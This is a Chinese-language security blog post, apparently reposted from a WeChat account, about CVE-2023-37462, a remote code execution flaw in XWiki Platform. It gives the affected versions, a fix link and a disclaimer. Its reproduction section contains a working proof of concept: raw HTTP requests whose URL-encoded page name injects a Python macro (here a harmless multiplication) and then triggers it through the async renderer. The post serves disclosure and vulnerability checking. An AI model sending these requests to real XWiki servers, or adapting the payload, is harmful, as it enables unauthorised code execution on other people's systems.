XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc

admin 2023年9月5日04:16:18评论19 views字数 2361阅读7分52秒阅读模式
XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc
0x01漏洞介绍

 

XWiki Platform是法国XWiki基金会的一套用于创建Web协作应用程序的Wiki平台。

XWiki Platform存在安全漏洞,该漏洞源于文档“SkinsCode.XWikiSkinsSheet”不当转义,从而导致远程代码执行。XWiki 平台是一个通用的 wiki 平台,为构建在其之上的应用程序提供运行时服务。 文档“SkinsCode.XWikiSkinsSheet”中的不当转义会导致从该文档的视图权限到编程权限的注入向量,或者换句话说,可以执行任意脚本宏,包括允许远程代码执行(包括无限制)的 Groovy 和 Python 宏对所有 wiki 内容的读写访问权限。 该攻击通过打开一个不存在的页面来进行,该页面的名称经过精心设计,包含危险的有效负载。 可以检查现有安装是否容易受到攻击。

 

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc
0x02影响版本

7.0-rc-1 <= XWiki Platform < 14.4.8

14.5 <= XWiki Platform < 14.10.4

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc
0x03漏洞复现

1.访问漏洞环境

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc

2.对漏洞进行复现

 POC (GET)

/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view

解码

print(3724348 * 8473334)

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc

/asyncrenderer/async/macro/xwiki%3ASkinsCode.XWikiSkinsSheet/12/author/xwiki%3AXWiki.Vavitel/secureDocument/xwiki%3ASkinsCode.XWikiSkinsSheet/73216?clientId=73216&timeout=500&wiki=xwiki

解码

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc

漏洞复现

         GET请求, 注入命令

GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

        操作1

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc

         解析执行命令

GET /asyncrenderer/async/macro/xwiki%3ASkinsCode.XWikiSkinsSheet/12/author/xwiki%3AXWiki.Vavitel/secureDocument/xwiki%3ASkinsCode.XWikiSkinsSheet/73216?clientId=73216&timeout=500&wiki=xwiki HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36Connection: closeAccept: */*Accept-Language: enCookie: JSESSIONID=A86B7F535B096996008E272EAD837DD7Accept-Encoding: gzip

        操作2

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc

3.nuclei测试(漏洞存在)

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc

 

XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) poc
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg

 

原文始发于微信公众号(弥天安全实验室):XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月5日04:16:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XWiki Platform Eval 远程命令执行漏洞(CVE-2023-37462) pochttps://cn-sec.com/archives/2008994.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息